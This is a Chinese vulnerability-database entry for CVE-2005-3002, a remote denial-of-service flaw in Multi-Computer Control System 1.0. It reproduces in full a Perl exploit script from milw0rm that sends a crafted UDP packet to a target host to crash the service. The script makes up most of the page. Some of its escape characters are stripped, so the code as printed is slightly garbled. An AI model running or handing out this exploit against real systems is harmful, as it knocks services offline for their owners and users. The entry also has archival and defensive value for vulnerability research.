Multi-Computer Control System (MCCS) 拒绝服务漏洞

Multi-Computer Control System (MCCS) 拒绝服务漏洞

漏洞ID 1109085 漏洞类型 未知
发布时间 2005-09-19 更新时间 2005-09-20
图片[1]-Multi-Computer Control System (MCCS) 拒绝服务漏洞-安全小百科CVE编号 CVE-2005-3002
图片[2]-Multi-Computer Control System (MCCS) 拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200509-179
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/1222
https://www.securityfocus.com/bid/89289
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-179
|漏洞详情
MCCS是多计算机控制系统软件。Multi-ComputerControlSystem(MCCS)1.0版本中,远程攻击者可以通过恶意UDP数据包触发服务拒绝。
|漏洞EXP
#!usr/bin/perl
#
# MCCS ServerClient Command DOS Exploit
# --------------------------------------
#  Infam0us Gr0up - Securiti Research
#
# Info: infamous.2hell.com
# Vendor URL: www.xclusive-software.com
#


use IO::Socket;

print("n  MCCS Command DOS Exploitn");
print("-----------------------------n");

$str = "x41";
if($#ARGV < 0 | $#ARGV > 1) {
die "usage: perl $0 [IP/host] nExam: perl $0 127.0.0.1 n" };

$adr = $ARGV[0];
$prt = "x38x30";

print "[+] Connect to host..n";
sleep 2;
$remote = IO::Socket::INET->new(Proto=>"x75x64x70", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "[-] Error: can't connect to $adr:$prtn";
print "[+] Connectedn";
$remote->autoflush(1);
print "[+] Sending bad string..n";
sleep 2;
print $remote "$str" or die "[-] Error: can't send string coden";
print "[*] Client Server SHUTDOWNED!nn";
print "press any key to exit..n";
$bla= <STDIN>;
close $remote;

# milw0rm.com [2005-09-19]
|受影响的产品
Xclusive-Software Mccs 1.0
|参考资料

来源:SECUNIA
名称:16865
链接:http://secunia.com/advisories/16865
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=93
来源:MISC
链接:http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous;_group=93

相关推荐: Symantec Norton Personal Firewall 2002 Portscan Protection Bypass Vulnerability

Symantec Norton Personal Firewall 2002 Portscan Protection Bypass Vulnerability 漏洞ID 1102222 漏洞类型 Design Error 发布时间 2002-04-16 更新时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享